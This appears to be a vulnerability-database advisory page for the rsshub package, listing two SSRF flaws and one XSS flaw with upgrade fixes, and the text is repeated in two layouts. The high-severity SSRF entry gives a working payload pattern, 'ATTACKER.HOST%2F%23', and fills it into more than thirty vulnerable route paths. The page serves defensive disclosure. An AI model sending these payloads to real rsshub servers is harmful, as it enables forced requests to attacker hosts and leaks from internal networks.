rsshub 1.0.0-master.72dd019 vulnerabilities

Known vulnerabilities in the rsshub package. This does not include vulnerabilities belonging to this package’s dependencies.

Vulnerability	Vulnerable Version
M Server-Side Request Forgery (SSRF) rsshub is a Make RSS Great Again! Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) due to improper validation of user-supplied URLs in several endpoints. An attacker can leverage this vulnerability to use the server as a proxy for sending HTTP GET requests to arbitrary destinations, potentially leading to information disclosure from the internal network or facilitating Denial-of-Service (DoS) attacks by causing the server to request large files or chaining multiple requests. How to fix Server-Side Request Forgery (SSRF)? Upgrade `rsshub` to version 1.0.0-master.a429472 or higher.	<1.0.0-master.a429472
M Cross-site Scripting (XSS) rsshub is a Make RSS Great Again! Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization via unvalidated URL parameters. How to fix Cross-site Scripting (XSS)? Upgrade `rsshub` to version 1.0.0-master.c910c4d or higher.	<1.0.0-master.c910c4d
H Server-side Request Forgery (SSRF) rsshub is a Make RSS Great Again! Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) such that an attacker can send a request to the affected routes with a malicious URL. For example, if an attacker controls the `ATTACKER.HOST` domain, they can send a request to affected routes with the value set to `ATTACKER.HOST%2F%23`. The `%2F` and `%23` characters are URL-encoded versions of the forward-slash (`/`) and pound (`#`) characters, respectively. In this context, an attacker could use those characters to append the base URL (i.e. `https://${input}.defined.host`) to be modified to `https://ATTACKER.HOST/#.defined.host`. This will cause the server to send a request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server. Note: The following routes are affected by this vulnerability: `/19lou/ATTACKER.HOST%2F%23/foo` `/bandisoft/1/ATTACKER.HOST%2F%23` `/bendibao/news/ATTACKER.HOST%2F%23` `/bitbucket/commits/.` (special treatment, set the `BITBUCKET_USERNAME` environment value to `ATTACKER.HOST%2F%23`)* `/blogs/hedwig/ATTACKER.HOST%2F%23` `/booth.pm/shop/ATTACKER.HOST%2F%23` `/caixin/blog/ATTACKER.HOST%2F%23` `/cnjxol/ATTACKER.HOST%2F%23` `/dut/ATTACKER.HOST%2F%23` `/eagle/blog/ATTACKER.HOST%2F%23` `/engadget/ATTACKER.HOST%2F%23` `/fashionnetwork/headline/ATTACKER.HOST%2F%23/hello/foo/bar` `/gamme/ATTACKER.HOST%2F%23` `/gitlab/explore/foo/ATTACKER.HOST%2F%23` `/gumroad/ATTACKER.HOST%2F%23/foo` `/itch/devlog/ATTACKER.HOST%2F%23/1` `/javdb/tags/foo=bar?domain=ATTACKER.HOST` `/mastodon/account_id/ATTACKER.HOST/1/statuses` `/mastodon/remote/ATTACKER.HOST` `/mastodon/timeline/ATTACKER.HOST` `/mirror/ATTACKER.HOST%2F%23id` (special treatment, should end with `id`) `/people/ATTACKER.HOST%2F%23` `/pornhub/ATTACKER.HOST%2F%23/category_url/foo` `/pornhub/ATTACKER.HOST%2F%23/model/foo` `/pornhub/ATTACKER.HOST%2F%23/pornstar/foo` `/pornhub/ATTACKER.HOST%2F%23/users/foo` `/scitation/ATTACKER.HOST%2F%23/foo` `/solidot/ATTACKER.HOST%2F%23` `/touhougarakuta/ATTACKER.HOST%2F%23/foo` `/yahoo-news/ATTACKER.HOST%2F%23` `/zhubai/ATTACKER.HOST%2F%23` `/ziroom/room/ATTACKER.HOST%2F%23/hello/foo/bar` How to fix Server-side Request Forgery (SSRF)? Upgrade `rsshub` to version 1.0.0-master.a66cbcf or higher.	<1.0.0-master.a66cbcf

Vulnerability

Vulnerable Version

Server-Side Request Forgery (SSRF)

rsshub is a Make RSS Great Again!

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) due to improper validation of user-supplied URLs in several endpoints. An attacker can leverage this vulnerability to use the server as a proxy for sending HTTP GET requests to arbitrary destinations, potentially leading to information disclosure from the internal network or facilitating Denial-of-Service (DoS) attacks by causing the server to request large files or chaining multiple requests.

How to fix Server-Side Request Forgery (SSRF)?

Upgrade rsshub to version 1.0.0-master.a429472 or higher.

<1.0.0-master.a429472

Cross-site Scripting (XSS)

rsshub is a Make RSS Great Again!

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization via unvalidated URL parameters.

How to fix Cross-site Scripting (XSS)?

Upgrade rsshub to version 1.0.0-master.c910c4d or higher.

<1.0.0-master.c910c4d

Server-side Request Forgery (SSRF)

rsshub is a Make RSS Great Again!

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) such that an attacker can send a request to the affected routes with a malicious URL. For example, if an attacker controls the ATTACKER.HOST domain, they can send a request to affected routes with the value set to ATTACKER.HOST%2F%23.

The %2F and %23 characters are URL-encoded versions of the forward-slash (/) and pound (#) characters, respectively. In this context, an attacker could use those characters to append the base URL (i.e. https://${input}.defined.host) to be modified to https://ATTACKER.HOST/#.defined.host. This will cause the server to send a request to the attacker-controlled domain, allowing the attacker to potentially gain access to sensitive information or perform further attacks on the server.

Note: The following routes are affected by this vulnerability:

/19lou/ATTACKER.HOST%2F%23/foo
/bandisoft/1/ATTACKER.HOST%2F%23
/bendibao/news/ATTACKER.HOST%2F%23
/bitbucket/commits/.* (special treatment, set the BITBUCKET_USERNAME environment value to ATTACKER.HOST%2F%23)
/blogs/hedwig/ATTACKER.HOST%2F%23
/booth.pm/shop/ATTACKER.HOST%2F%23
/caixin/blog/ATTACKER.HOST%2F%23
/cnjxol/ATTACKER.HOST%2F%23
/dut/ATTACKER.HOST%2F%23
/eagle/blog/ATTACKER.HOST%2F%23
/engadget/ATTACKER.HOST%2F%23
/fashionnetwork/headline/ATTACKER.HOST%2F%23/hello/foo/bar
/gamme/ATTACKER.HOST%2F%23
/gitlab/explore/foo/ATTACKER.HOST%2F%23
/gumroad/ATTACKER.HOST%2F%23/foo
/itch/devlog/ATTACKER.HOST%2F%23/1
/javdb/tags/foo=bar?domain=ATTACKER.HOST
/mastodon/account_id/ATTACKER.HOST/1/statuses
/mastodon/remote/ATTACKER.HOST
/mastodon/timeline/ATTACKER.HOST
/mirror/ATTACKER.HOST%2F%23id (special treatment, should end with id)
/people/ATTACKER.HOST%2F%23
/pornhub/ATTACKER.HOST%2F%23/category_url/foo
/pornhub/ATTACKER.HOST%2F%23/model/foo
/pornhub/ATTACKER.HOST%2F%23/pornstar/foo
/pornhub/ATTACKER.HOST%2F%23/users/foo
/scitation/ATTACKER.HOST%2F%23/foo
/solidot/ATTACKER.HOST%2F%23
/touhougarakuta/ATTACKER.HOST%2F%23/foo
/yahoo-news/ATTACKER.HOST%2F%23
/zhubai/ATTACKER.HOST%2F%23
/ziroom/room/ATTACKER.HOST%2F%23/hello/foo/bar

How to fix Server-side Request Forgery (SSRF)?

Upgrade rsshub to version 1.0.0-master.a66cbcf or higher.

<1.0.0-master.a66cbcf

rsshub@1.0.0-master.72dd019 vulnerabilities

Make RSS Great Again!

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

How to fix?